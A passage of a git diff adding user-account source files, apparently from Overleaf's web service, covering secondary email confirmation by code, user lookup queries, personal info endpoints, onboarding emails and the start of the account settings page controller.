const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(400) + } + const user = await UserGetter.promises.getUserByAnyEmail(email, { _id: 1 }) + + if (!user || user._id.toString() !== userId) { + return res.sendStatus(422) + } + await UserEmailsConfirmationHandler.promises.sendReconfirmationEmail( + userId, + email + ) + + res.sendStatus(204) +} + +async function sendExistingSecondaryEmailConfirmationCode(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(400) + } + const user = await UserGetter.promises.getUserByAnyEmail(email, { + _id: 1, + email, + }) + if (!user || user._id.toString() !== userId) { + return res.sendStatus(422) + } + await sendCodeAndStoreInSession(req, 'pendingExistingEmail', email) + res.sendStatus(204) +} + +/** + * This method is for adding a secondary email to be confirmed via a code. + * For email link confirmation see the `add` method in this file. + */ +async function addWithConfirmationCode(req, res) { + delete req.session.pendingSecondaryEmail + + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + const affiliationOptions = { + university: req.body.university, + role: req.body.role, + department: req.body.department, + } + + if (!email) { + return res.sendStatus(422) + } + + const user = await UserGetter.promises.getUser(userId, { + email: 1, + 'emails.email': 1, + }) + + if (user.emails.length >= Settings.emailAddressLimit) { + return res.status(422).json({ message: 'secondary email limit exceeded' }) + } + + try { + await UserGetter.promises.ensureUniqueEmailAddress(email) + + await sendConfirmCodeRateLimiter.consume(email, 1, { + method: 'email', + }) + + await UserAuditLogHandler.promises.addEntry( + userId, + 'request-add-email-code', + userId, + req.ip, + { + newSecondaryEmail: email, + } + ) + + await sendCodeAndStoreInSession( + req, + 'pendingSecondaryEmail', + email, + affiliationOptions + ) + + return res.sendStatus(200) + } catch (err) { + if (err.name === 'EmailExistsError') { + return res.status(409).json({ + message: { + type: 'error', + text: req.i18n.translate('email_already_registered'), + }, + }) + } + + if (err?.remainingPoints === 0) { + return res.status(429).json({}) + } + + logger.err({ err }, 'failed to send confirmation code') + + delete req.session.pendingSecondaryEmail + + return res.status(500).json({ + message: { + key: 'error_performing_request', + }, + }) + } +} + +/** + * @param {import('express').Request} req + * @param {string} sessionKey + * @param {string} email + * @param affiliationOptions + * @returns {Promise<void>} + */ +async function sendCodeAndStoreInSession( + req, + sessionKey, + email, + affiliationOptions +) { + const { confirmCode, confirmCodeExpiresTimestamp } = + await UserEmailsConfirmationHandler.promises.sendConfirmationCode( + email, + false + ) + req.session[sessionKey] = { + email, + confirmCode, + confirmCodeExpiresTimestamp, + affiliationOptions, + } +} + +/** + * @param {string} sessionKey + * @param {(req: import('express').Request, user: any, email: string, affiliationOptions: any) => Promise<void>} beforeConfirmEmail + * @returns {Promise<*>} + */ +const _checkConfirmationCode = + (sessionKey, beforeConfirmEmail) => async (req, res) => { + const userId = SessionManager.getLoggedInUserId(req.session) + const code = req.body.code + const user = await UserGetter.promises.getUser(userId, { + email: 1, + 'emails.email': 1, + }) + + const sessionData = req.session[sessionKey] + + if (!sessionData) { + logger.err({}, `error checking confirmation code. missing ${sessionKey}`) + + return res.status(422).json({ + message: { + key: 'error_performing_request', + }, + }) + } + + const emailToCheck = sessionData.email + + try { + await checkConfirmCodeRateLimiter.consume(emailToCheck, 1, { + method: 'email', + }) + } catch (err) { + if (err?.remainingPoints === 0) { + return res.sendStatus(429) + } else { + return res.status(500).json({ + message: { + key: 'error_performing_request', + }, + }) + } + } + + if (sessionData.confirmCodeExpiresTimestamp < Date.now()) { + return res.status(403).json({ + message: { key: 'expired_confirmation_code' }, + }) + } + + if (!tsscmp(sessionData.confirmCode, code)) { + return res.status(403).json({ + message: { key: 'invalid_confirmation_code' }, + }) + } + + try { + await beforeConfirmEmail( + req, + user, + emailToCheck, + sessionData.affiliationOptions + ) + + await UserUpdater.promises.confirmEmail( + userId, + emailToCheck, + sessionData.affiliationOptions + ) + + delete req.session[sessionKey] + + AnalyticsManager.recordEventForUserInBackground( + user._id, + 'email-verified', + { + provider: 'email', + verification_type: 'token', + isPrimary: user.email === emailToCheck, + } + ) + + const redirectUrl = + AuthenticationController.getRedirectFromSession(req) || '/project' + + return res.json({ + redir: redirectUrl, + }) + } catch (error) { + if (error.name === 'EmailExistsError') { + return res.status(409).json({ + message: { + type: 'error', + text: req.i18n.translate('email_already_registered'), + }, + }) + } + + logger.err({ error }, 'failed to check confirmation code') + + return res.status(500).json({ + message: { + key: 'error_performing_request', + }, + }) + } + } + +const checkNewSecondaryEmailConfirmationCode = _checkConfirmationCode( + 'pendingSecondaryEmail', + async (req, user, email, affiliationOptions) => { + await UserAuditLogHandler.promises.addEntry( + user._id, + 'add-email-via-code', + user._id, + req.ip, + { newSecondaryEmail: email } + ) + await _sendSecurityAlertEmail(user, email) + await UserUpdater.promises.addEmailAddress( + user._id, + email, + affiliationOptions, + { + initiatorId: user._id, + ipAddress: req.ip, + } + ) + } +) + +const checkExistingEmailConfirmationCode = _checkConfirmationCode( + 'pendingExistingEmail', + async (req, user, email) => { + await UserAuditLogHandler.promises.addEntry( + user._id, + 'confirm-email-via-code', + user._id, + req.ip, + { email } + ) + } +) + +const _resendConfirmationCode = + (sessionKey, operation, auditLogEmailKey) => async (req, res) => { + const sessionData = req.session[sessionKey] + if (!sessionData) { + logger.err({}, `error resending confirmation code. missing ${sessionKey}`) + return res.status(422).json({ + message: { + key: 'error_performing_request', + }, + }) + } + + const email = sessionData.email + + try { + await resendConfirmCodeRateLimiter.consume(email, 1, { method: 'email' }) + } catch (err) { + if (err?.remainingPoints === 0) { + return res.status(429).json({}) + } else { + throw err + } + } + + const userId = SessionManager.getLoggedInUserId(req.session) + + try { + await UserAuditLogHandler.promises.addEntry( + userId, + operation, + userId, + req.ip, + { [auditLogEmailKey]: email } + ) + + const { confirmCode, confirmCodeExpiresTimestamp } = + await UserEmailsConfirmationHandler.promises.sendConfirmationCode( + email, + false + ) + + sessionData.confirmCode = confirmCode + sessionData.confirmCodeExpiresTimestamp = confirmCodeExpiresTimestamp + + return res.status(200).json({ message: { key: 'we_sent_new_code' } }) + } catch (err) { + logger.err({ err, userId, email }, 'failed to send confirmation code') + return res.status(500).json({ key: 'error_performing_request' }) + } + } + +const resendNewSecondaryEmailConfirmationCode = _resendConfirmationCode( + 'pendingSecondaryEmail', + 'resend-add-email-code', + 'newSecondaryEmail' +) + +const resendExistingSecondaryEmailConfirmationCode = _resendConfirmationCode( + 'pendingExistingEmail', + 'resend-confirm-email-code', + 'email' +) + +async function confirmSecondaryEmailPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + + if (!req.session.pendingSecondaryEmail) { + const redirectURL = + AuthenticationController.getRedirectFromSession(req) || '/project' + return res.redirect(redirectURL) + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'confirm-secondary-email-page-displayed' + ) + + res.render('user/confirmSecondaryEmail', { + email: req.session.pendingSecondaryEmail.email, + }) +} + +async function addSecondaryEmailPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + + const confirmedEmails = + await UserGetter.promises.getUserConfirmedEmails(userId) + + if (confirmedEmails.length >= 2) { + const redirectURL = + AuthenticationController.getRedirectFromSession(req) || '/project' + return res.redirect(redirectURL) + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'add-secondary-email-page-displayed' + ) + + res.render('user/addSecondaryEmail') +} + +async function primaryEmailCheckPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const user = await UserGetter.promises.getUser(userId, { + lastPrimaryEmailCheck: 1, + signUpDate: 1, + email: 1, + emails: 1, + }) + + if (!UserPrimaryEmailCheckHandler.requiresPrimaryEmailCheck(user)) { + return res.redirect('/project') + } + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'primary-email-check-page-displayed' + ) + const { variant } = await SplitTestHandler.promises.getAssignment( + req, + res, + 'auth-pages-bs5' + ) + + const template = + variant === 'enabled' + ? 'user/primaryEmailCheck-bs5' + : 'user/primaryEmailCheck' + + res.render(template) +} + +async function primaryEmailCheck(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + await UserUpdater.promises.updateUser(userId, { + $set: { lastPrimaryEmailCheck: new Date() }, + }) + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'primary-email-check-done' + ) + + // We want to redirect to prompt a user to add a secondary email if their primary + // is an institutional email and they dont' already have a secondary. + if (Features.hasFeature('saas') && req.capabilitySet.has('add-affiliation')) { + const confirmedEmails = + await UserGetter.promises.getUserConfirmedEmails(userId) + + if (confirmedEmails.length < 2) { + const { email: primaryEmail } = SessionManager.getSessionUser(req.session) + const primaryEmailDomain = EmailHelper.getDomain(primaryEmail) + + const institution = ( + await Modules.promises.hooks.fire( + 'getInstitutionViaDomain', + primaryEmailDomain + ) + )?.[0] + + if (institution) { + return AsyncFormHelper.redirect(req, res, '/user/emails/add-secondary') + } + } + } + + AsyncFormHelper.redirect(req, res, '/project') +} + +async function showConfirm(req, res, next) { + res.render('user/confirm_email', { + token: req.query.token, + title: 'confirm_email', + }) +} + +async function remove(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + const auditLog = { + initiatorId: userId, + ipAddress: req.ip, + } + await UserUpdater.promises.removeEmailAddress(userId, email, auditLog) + res.sendStatus(200) +} + +async function setDefault(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + + if (!email) { + return res.sendStatus(422) + } + + const { emails, email: oldDefault } = await UserGetter.promises.getUser( + userId, + { email: 1, emails: 1 } + ) + const primaryEmailData = emails?.find(email => email.email === oldDefault) + const deleteOldEmail = + req.query['delete-unconfirmed-primary'] !== undefined && + primaryEmailData && + !primaryEmailData.confirmedAt + + const auditLog = { + initiatorId: userId, + ipAddress: req.ip, + } + try { + await UserUpdater.promises.setDefaultEmailAddress( + userId, + email, + false, + auditLog, + true, + deleteOldEmail + ) + } catch (err) { + return UserEmailsController._handleEmailError(err, req, res, next) + } + SessionManager.setInSessionUser(req.session, { email }) + const user = SessionManager.getSessionUser(req.session) + try { + await UserSessionsManager.promises.removeSessionsFromRedis( + user, + req.sessionID // remove all sessions except the current session + ) + } catch (err) { + logger.warn( + { err }, + 'failed revoking secondary sessions after changing default email' + ) + } + if ( + req.query['delete-unconfirmed-primary'] !== undefined && + primaryEmailData && + !primaryEmailData.confirmedAt + ) { + await UserUpdater.promises.removeEmailAddress( + userId, + primaryEmailData.email, + { + initiatorId: userId, + ipAddress: req.ip, + extraInfo: { + info: 'removed unconfirmed email after setting new primary', + }, + } + ) + } + res.sendStatus(200) +} + +const UserEmailsController = { + list(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + UserGetter.getUserFullEmails(userId, function (error, fullEmails) { + if (error) { + return next(error) + } + res.json(fullEmails) + }) + }, + + add: expressify(add), + + addWithConfirmationCode: expressify(addWithConfirmationCode), + + checkNewSecondaryEmailConfirmationCode: expressify( + checkNewSecondaryEmailConfirmationCode + ), + + checkExistingEmailConfirmationCode: expressify( + checkExistingEmailConfirmationCode + ), + + resendNewSecondaryEmailConfirmationCode: expressify( + resendNewSecondaryEmailConfirmationCode + ), + + resendExistingSecondaryEmailConfirmationCode: expressify( + resendExistingSecondaryEmailConfirmationCode + ), + + remove: expressify(remove), + + setDefault: expressify(setDefault), + + endorse(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + + endorseAffiliation( + userId, + email, + req.body.role, + req.body.department, + function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + } + ) + }, + + resendConfirmation: expressify(resendConfirmation), + + sendReconfirmation: expressify(sendReconfirmation), + + sendExistingSecondaryEmailConfirmationCode: expressify( + sendExistingSecondaryEmailConfirmationCode + ), + + addSecondaryEmailPage: expressify(addSecondaryEmailPage), + + confirmSecondaryEmailPage: expressify(confirmSecondaryEmailPage), + + primaryEmailCheckPage: expressify(primaryEmailCheckPage), + + primaryEmailCheck: expressify(primaryEmailCheck), + + showConfirm: expressify(showConfirm), + + confirm(req, res, next) { + const { token } = req.body + if (!token) { + return res.status(422).json({ + message: req.i18n.translate('confirmation_link_broken'), + }) + } + UserEmailsConfirmationHandler.confirmEmailFromToken( + req, + token, + function (error, userData) { + if (error) { + if (error instanceof Errors.ForbiddenError) { + res.status(403).json({ + message: { + key: 'confirm-email-wrong-user', + text: `We can’t confirm this email. You must be logged in with the Overleaf account that requested the new secondary email.`, + }, + }) + } else if (error instanceof Errors.NotFoundError) { + res.status(404).json({ + message: req.i18n.translate('confirmation_token_invalid'), + }) + } else { + next(error) + } + } else { + const { userId, email } = userData + const tokenPrefix = token.substring(0, AUDIT_LOG_TOKEN_PREFIX_LENGTH) + UserAuditLogHandler.addEntry( + userId, + 'confirm-email', + userId, + req.ip, + { token: tokenPrefix, email }, + auditLogError => { + if (auditLogError) { + logger.error( + { error: auditLogError, userId, token: tokenPrefix }, + 'failed to add audit log entry' + ) + } + UserGetter.getUser( + userData.userId, + { email: 1 }, + function (error, user) { + if (error) { + logger.error( + { error, userId: userData.userId }, + 'failed to get user' + ) + } + const isPrimary = user?.email === userData.email + AnalyticsManager.recordEventForUserInBackground( + userData.userId, + 'email-verified', + { + provider: 'email', + verification_type: 'link', + isPrimary, + } + ) + res.sendStatus(200) + } + ) + } + ) + } + } + ) + }, + + _handleEmailError(error, req, res, next) { + if (error instanceof Errors.UnconfirmedEmailError) { + return HttpErrorHandler.conflict(req, res, 'email must be confirmed') + } else if (error instanceof Errors.EmailExistsError) { + const message = req.i18n.translate('email_already_registered') + return HttpErrorHandler.conflict(req, res, message) + } else if (error.message === '422: Email does not belong to university') { + const message = req.i18n.translate('email_does_not_belong_to_university') + return HttpErrorHandler.conflict(req, res, message) + } + next(error) + }, +} + +module.exports = UserEmailsController diff --git a/services/web/app/src/Features/User/UserGetter.js b/services/web/app/src/Features/User/UserGetter.js new file mode 100644 index 0000000..34d758a --- /dev/null +++ b/services/web/app/src/Features/User/UserGetter.js @@ -0,0 +1,343 @@ +const { callbackify } = require('util') +const { db } = require('../../infrastructure/mongodb') +const moment = require('moment') +const settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') +const { + promises: InstitutionsAPIPromises, +} = require('../Institutions/InstitutionsAPI') +const InstitutionsHelper = require('../Institutions/InstitutionsHelper') +const Errors = require('../Errors/Errors') +const Features = require('../../infrastructure/Features') +const { User } = require('../../models/User') +const { normalizeQuery, normalizeMultiQuery } = require('../Helpers/Mongo') + +function _lastDayToReconfirm(emailData, institutionData) { + const globalReconfirmPeriod = settings.reconfirmNotificationDays + if (!globalReconfirmPeriod) return undefined + + // only show notification for institutions with reconfirmation enabled + if (!institutionData || !institutionData.maxConfirmationMonths) + return undefined + + if (!emailData.confirmedAt) return undefined + + if (institutionData.ssoEnabled && !emailData.samlProviderId) { + // For SSO, only show notification for linked email + return false + } + + // reconfirmedAt will not always be set, use confirmedAt as fallback + const lastConfirmed = emailData.reconfirmedAt || emailData.confirmedAt + + return moment(lastConfirmed) + .add(institutionData.maxConfirmationMonths, 'months') + .toDate() +} + +function _pastReconfirmDate(lastDayToReconfirm) { + if (!lastDayToReconfirm) return false + return moment(lastDayToReconfirm).isBefore() +} + +function _emailInReconfirmNotificationPeriod( + cachedLastDayToReconfirm, + lastDayToReconfirm +) { + const globalReconfirmPeriod = settings.reconfirmNotificationDays + + if (!globalReconfirmPeriod || !cachedLastDayToReconfirm) return false + + const notificationStarts = moment(cachedLastDayToReconfirm).subtract( + globalReconfirmPeriod, + 'days' + ) + + let isInNotificationPeriod = moment().isAfter(notificationStarts) + + if (!isInNotificationPeriod) { + // for possible issues in v1/v2 date mismatch, ensure v2 date doesn't show as needing to reconfirm + + const notificationStartsV2 = moment(lastDayToReconfirm).subtract( + globalReconfirmPeriod, + 'days' + ) + + isInNotificationPeriod = moment().isAfter(notificationStartsV2) + } + + return isInNotificationPeriod +} + +async function getUserFullEmails(userId) { + const user = await UserGetter.promises.getUser(userId, { + email: 1, + emails: 1, + samlIdentifiers: 1, + }) + + if (!user) { + throw new Error('User not Found') + } + + if (!Features.hasFeature('affiliations')) { + return decorateFullEmails(user.email, user.emails, [], []) + } + + const affiliationsData = + await InstitutionsAPIPromises.getUserAffiliations(userId) + + return decorateFullEmails( + user.email, + user.emails || [], + affiliationsData, + user.samlIdentifiers || [] + ) +} + +async function getUserConfirmedEmails(userId) { + const user = await UserGetter.promises.getUser(userId, { + emails: 1, + }) + + if (!user) { + throw new Error('User not Found') + } + + return user.emails.filter(email => !!email.confirmedAt) +} + +async function getSsoUsersAtInstitution(institutionId, projection) { + if (!projection) { + throw new Error('missing projection') + } + + return await User.find( + { + 'samlIdentifiers.providerId': institutionId.toString(), + }, + projection + ).exec() +} + +const UserGetter = { + getSsoUsersAtInstitution: callbackify(getSsoUsersAtInstitution), + + getUser(query, projection, callback) { + if (arguments.length === 2) { + callback = projection + projection = {} + } + try { + query = normalizeQuery(query) + db.users.findOne(query, { projection }, callback) + } catch (err) { + callback(err) + } + }, + + getUserFeatures(userId, callback) { + this.getUser(userId, { features: 1 }, (error, user) => { + if (error) return callback(error) + if (!user) return callback(new Errors.NotFoundError('user not found')) + callback(null, user.features) + }) + }, + + getUserEmail(userId, callback) { + this.getUser(userId, { email: 1 }, (error, user) => + callback(error, user && user.email) + ) + }, + + getUserFullEmails: callbackify(getUserFullEmails), + + getUserConfirmedEmails: callbackify(getUserConfirmedEmails), + + getUserByMainEmail(email, projection, callback) { + email = email.trim() + if (arguments.length === 2) { + callback = projection + projection = {} + } + db.users.findOne({ email }, { projection }, callback) + }, + + getUserByAnyEmail(email, projection, callback) { + email = email.trim() + if (arguments.length === 2) { + callback = projection + projection = {} + } + // $exists: true MUST be set to use the partial index + const query = { emails: { $exists: true }, 'emails.email': email } + db.users.findOne(query, { projection }, (error, user) => { + if (error || user) { + return callback(error, user) + } + + // While multiple emails are being rolled out, check for the main email as + // well + this.getUserByMainEmail(email, projection, callback) + }) + }, + + getUsersByAnyConfirmedEmail(emails, projection, callback) { + if (arguments.length === 2) { + callback = projection + projection = {} + } + + const query = { + 'emails.email': { $in: emails }, // use the index on emails.email + emails: { + $exists: true, + $elemMatch: { + email: { $in: emails }, + confirmedAt: { $exists: true }, + }, + }, + } + + db.users.find(query, { projection }).toArray(callback) + }, + + getUsersByV1Ids(v1Ids, projection, callback) { + if (arguments.length === 2) { + callback = projection + projection = {} + } + const query = { 'overleaf.id': { $in: v1Ids } } + db.users.find(query, { projection }).toArray(callback) + }, + + getUsersByHostname(hostname, projection, callback) { + const reversedHostname = hostname.trim().split('').reverse().join('') + const query = { + emails: { $exists: true }, + 'emails.reversedHostname': reversedHostname, + } + db.users.find(query, { projection }).toArray(callback) + }, + + getInstitutionUsersByHostname(hostname, callback) { + const projection = { + _id: 1, + email: 1, + emails: 1, + samlIdentifiers: 1, + } + UserGetter.getUsersByHostname(hostname, projection, (err, users) => { + if (err) return callback(err) + + users.forEach(user => { + user.emails = decorateFullEmails( + user.email, + user.emails, + [], + user.samlIdentifiers || [] + ) + }) + callback(null, users) + }) + }, + + getUsers(query, projection, callback) { + try { + query = normalizeMultiQuery(query) + db.users.find(query, { projection }).toArray(callback) + } catch (err) { + callback(err) + } + }, + + // check for duplicate email address. This is also enforced at the DB level + ensureUniqueEmailAddress(newEmail, callback) { + this.getUserByAnyEmail(newEmail, function (error, user) { + if (user) { + return callback(new Errors.EmailExistsError()) + } + callback(error) + }) + }, +} + +const decorateFullEmails = ( + defaultEmail, + emailsData, + affiliationsData, + samlIdentifiers +) => { + emailsData.forEach(function (emailData) { + emailData.default = emailData.email === defaultEmail + + const affiliation = affiliationsData.find( + aff => aff.email === emailData.email + ) + if (affiliation) { + const { + institution, + inferred, + role, + department, + licence, + cached_confirmed_at: cachedConfirmedAt, + cached_reconfirmed_at: cachedReconfirmedAt, + past_reconfirm_date: cachedPastReconfirmDate, + entitlement: cachedEntitlement, + portal, + } = affiliation + const lastDayToReconfirm = _lastDayToReconfirm(emailData, institution) + let { last_day_to_reconfirm: cachedLastDayToReconfirm } = affiliation + if (institution.ssoEnabled && !emailData.samlProviderId) { + // only SSO linked emails are reconfirmed at SSO institutions + cachedLastDayToReconfirm = undefined + } + const pastReconfirmDate = _pastReconfirmDate(lastDayToReconfirm) + const inReconfirmNotificationPeriod = _emailInReconfirmNotificationPeriod( + cachedLastDayToReconfirm, + lastDayToReconfirm + ) + emailData.affiliation = { + institution, + inferred, + inReconfirmNotificationPeriod, + lastDayToReconfirm, + cachedConfirmedAt, + cachedLastDayToReconfirm, + cachedReconfirmedAt, + cachedEntitlement, + cachedPastReconfirmDate, + pastReconfirmDate, + role, + department, + licence, + portal, + } + } + + if (emailData.samlProviderId) { + emailData.samlIdentifier = samlIdentifiers.find( + samlIdentifier => samlIdentifier.providerId === emailData.samlProviderId + ) + } + + emailData.emailHasInstitutionLicence = + InstitutionsHelper.emailHasLicence(emailData) + + const lastConfirmedAtStr = emailData.reconfirmedAt || emailData.confirmedAt + emailData.lastConfirmedAt = lastConfirmedAtStr + ? moment(lastConfirmedAtStr).toDate() + : null + }) + + return emailsData +} + +UserGetter.promises = promisifyAll(UserGetter, { + without: ['getSsoUsersAtInstitution', 'getUserFullEmails'], +}) +UserGetter.promises.getUserFullEmails = getUserFullEmails +UserGetter.promises.getSsoUsersAtInstitution = getSsoUsersAtInstitution + +module.exports = UserGetter diff --git a/services/web/app/src/Features/User/UserHandler.js b/services/web/app/src/Features/User/UserHandler.js new file mode 100644 index 0000000..cdd2e51 --- /dev/null +++ b/services/web/app/src/Features/User/UserHandler.js @@ -0,0 +1,31 @@ +const { callbackify, promisify } = require('@overleaf/promise-utils') +const TeamInvitesHandler = require('../Subscription/TeamInvitesHandler') +const { + db, + READ_PREFERENCE_SECONDARY, +} = require('../../infrastructure/mongodb') + +function populateTeamInvites(user, callback) { + TeamInvitesHandler.createTeamInvitesForLegacyInvitedEmail( + user.email, + callback + ) +} + +async function countActiveUsers() { + const oneYearAgo = new Date() + oneYearAgo.setFullYear(oneYearAgo.getFullYear() - 1) + return await db.users.countDocuments( + { lastActive: { $gte: oneYearAgo } }, + { readPreference: READ_PREFERENCE_SECONDARY } + ) +} + +module.exports = { + populateTeamInvites, + countActiveUsers: callbackify(countActiveUsers), +} +module.exports.promises = { + populateTeamInvites: promisify(populateTeamInvites), + countActiveUsers, +} diff --git a/services/web/app/src/Features/User/UserInfoController.js b/services/web/app/src/Features/User/UserInfoController.js new file mode 100644 index 0000000..4eeea4f --- /dev/null +++ b/services/web/app/src/Features/User/UserInfoController.js @@ -0,0 +1,86 @@ +const UserGetter = require('./UserGetter') +const SessionManager = require('../Authentication/SessionManager') +const { ObjectId } = require('mongodb-legacy') + +function getLoggedInUsersPersonalInfo(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + if (!userId) { + return next(new Error('User is not logged in')) + } + UserGetter.getUser( + userId, + { + first_name: true, + last_name: true, + role: true, + institution: true, + email: true, + signUpDate: true, + }, + function (error, user) { + if (error) { + return next(error) + } + sendFormattedPersonalInfo(user, res, next) + } + ) +} + +function getPersonalInfo(req, res, next) { + let query + const userId = req.params.user_id + + if (/^\d+$/.test(userId)) { + query = { 'overleaf.id': parseInt(userId, 10) } + } else if (/^[a-f0-9]{24}$/.test(userId)) { + query = { _id: new ObjectId(userId) } + } else { + return res.sendStatus(400) + } + + UserGetter.getUser( + query, + { _id: true, first_name: true, last_name: true, email: true }, + function (error, user) { + if (error) { + return next(error) + } + if (!user) { + return res.sendStatus(404) + } + sendFormattedPersonalInfo(user, res, next) + } + ) +} + +function sendFormattedPersonalInfo(user, res, next) { + const info = formatPersonalInfo(user) + res.json(info) +} + +function formatPersonalInfo(user) { + if (!user) { + return {} + } + const formattedUser = { id: user._id.toString() } + for (const key of [ + 'first_name', + 'last_name', + 'email', + 'signUpDate', + 'role', + 'institution', + ]) { + if (user[key]) { + formattedUser[key] = user[key] + } + } + return formattedUser +} + +module.exports = { + getLoggedInUsersPersonalInfo, + getPersonalInfo, + sendFormattedPersonalInfo, + formatPersonalInfo, +} diff --git a/services/web/app/src/Features/User/UserInfoManager.js b/services/web/app/src/Features/User/UserInfoManager.js new file mode 100644 index 0000000..7133cf0 --- /dev/null +++ b/services/web/app/src/Features/User/UserInfoManager.js @@ -0,0 +1,18 @@ +const UserGetter = require('./UserGetter') +const { callbackify } = require('@overleaf/promise-utils') + +async function getPersonalInfo(userId) { + return UserGetter.promises.getUser(userId, { + _id: true, + first_name: true, + last_name: true, + email: true, + }) +} + +module.exports = { + getPersonalInfo: callbackify(getPersonalInfo), + promises: { + getPersonalInfo, + }, +} diff --git a/services/web/app/src/Features/User/UserOnboardingEmailManager.js b/services/web/app/src/Features/User/UserOnboardingEmailManager.js new file mode 100644 index 0000000..dd984c4 --- /dev/null +++ b/services/web/app/src/Features/User/UserOnboardingEmailManager.js @@ -0,0 +1,29 @@ +const Queues = require('../../infrastructure/Queues') +const EmailHandler = require('../Email/EmailHandler') +const UserUpdater = require('./UserUpdater') +const UserGetter = require('./UserGetter') +const Settings = require('@overleaf/settings') + +const ONE_DAY_MS = 24 * 60 * 60 * 1000 + +async function scheduleOnboardingEmail(user) { + await Queues.createScheduledJob( + 'emails-onboarding', + { data: { userId: user._id } }, + ONE_DAY_MS + ) +} + +async function sendOnboardingEmail(userId) { + const user = await UserGetter.promises.getUser({ _id: userId }, { email: 1 }) + if (Settings.enableOnboardingEmails && user) { + await EmailHandler.promises.sendEmail('userOnboardingEmail', { + to: user.email, + }) + await UserUpdater.promises.updateUser(user._id, { + $set: { onboardingEmailSentAt: new Date() }, + }) + } +} + +module.exports = { scheduleOnboardingEmail, sendOnboardingEmail } diff --git a/services/web/app/src/Features/User/UserPagesController.mjs b/services/web/app/src/Features/User/UserPagesController.mjs new file mode 100644 index 0000000..6f7bb78 --- /dev/null +++ b/services/web/app/src/Features/User/UserPagesController.mjs @@ -0,0 +1,341 @@ +import UserGetter from './UserGetter.js' +import OError from '@overleaf/o-error' +import UserSessionsManager from './UserSessionsManager.js' +import logger from '@overleaf/logger' +import Settings from '@overleaf/settings' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import SessionManager from '../Authentication/SessionManager.js' +import NewsletterManager from '../Newsletter/NewsletterManager.js' +import SubscriptionLocator from '../Subscription/SubscriptionLocator.js' +import _ from 'lodash' +import { expressify } from '@overleaf/promise-utils' +import Features from '../../infrastructure/Features.js' +import SplitTestHandler from '../SplitTests/SplitTestHandler.js' +import Modules from '../../infrastructure/Modules.js' + +async function settingsPage(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const reconfirmationRemoveEmail = req.query.remove + // SSO + const ssoError = req.session.ssoError + if (ssoError) { + delete req.session.ssoError + } + const ssoErrorMessage = req.session.ssoErrorMessage + if (ssoErrorMessage) { + delete req.session.ssoErrorMessage + } + const projectSyncSuccessMessage = req.session.projectSyncSuccessMessage + if (projectSyncSuccessMessage) { + delete req.session.projectSyncSuccessMessage + } + // Institution SSO + let institutionLinked = _.get(req.session, ['saml', 'linked']) + if (institutionLinked) { + // copy object if exists because _.get does not + institutionLinked = Object.assign( + { + hasEntitlement: _.get(req.session, ['saml', 'hasEntitlement']), + }, + institutionLinked + ) + } + const samlError = _.get(req.session, ['saml', 'error']) + const institutionEmailNonCanonical = _.get(req.session, [ + 'saml', + 'emailNonCanonical', + ]) + const institutionRequestedEmail = _.get(req.session, [ + 'saml', + 'requestedEmail', + ]) + + const reconfirmedViaSAML = _.get(req.session, ['saml', 'reconfirmed']) + delete req.session.saml + let shouldAllowEditingDetails = true + if (Settings.ldap && Settings.ldap.updateUserDetailsOnLogin) { + shouldAllowEditingDetails = false + } + if (Settings.saml && Settings.saml.updateUserDetailsOnLogin) { + shouldAllowEditingDetails = false + } + const oauthProviders = Settings.oauthProviders || {} + + const user = await UserGetter.promises.getUser(userId) + if (!user) { + // The user has just deleted their account. + return UserSessionsManager.removeSessionsFromRedis( + { _id: userId }, + null, + () => res.redirect('/') + ) + } + + let personalAccessTokens + try { + const results = await Modules.promises.hooks.fire( + 'listPersonalAccessTokens', + user._id + ) + personalAccessTokens = results?.[0] ?? [] + } catch (error) { + const err = OError.tag(error, 'listPersonalAccessTokens hook failed') + logger.error({ err, userId }, err.message) + } + + let currentManagedUserAdminEmail + try { + currentManagedUserAdminEmail = + await SubscriptionLocator.promises.getAdminEmail(req.managedBy) + } catch (err) { + logger.error({ err }, 'error getting subscription admin email') + } + + let memberOfSSOEnabledGroups = [] + try { + memberOfSSOEnabledGroups = + ( + await Modules.promises.hooks.fire( + 'getUserGroupsSSOEnrollmentStatus', + user._id, + { teamName: 1 }, + ['email'] + ) + )?.[0] || [] + memberOfSSOEnabledGroups = memberOfSSOEnabledGroups.map(group => { + return { + groupId: group._id.toString(), + linked: group.linked, + groupName: group.teamName, + adminEmail: group.admin_id?.email, + } + }) + } catch (error) { + logger.error( + { err: error }, + 'error fetching groups with Group SSO enabled the user may be member of' + ) + } + + res.render('user/settings', { + title: 'account_settings', + user: { + id: user._id, + isAdmin: user.isAdmin, + email: user.email, + allowedFreeTrial: user.allowedFreeTrial, + first_name: user.first_name, + last_name: user.last_name, + alphaProgram: user.alphaProgram, + betaProgram: user.betaProgram, + labsProgram: user.labsProgram, + features: { + dropbox: user.features.dropbox, + github: user.features.github, + mendeley: user.features.mendeley, + zotero: user.features.zotero, + papers: user.features.papers, + references: user.features.references, + }, + refProviders: { + mendeley: Boolean(user.refProviders?.mendeley), + zotero: Boolean(user.refProviders?.zotero), + papers: Boolean(user.refProviders?.papers), + }, + writefull: { + enabled: 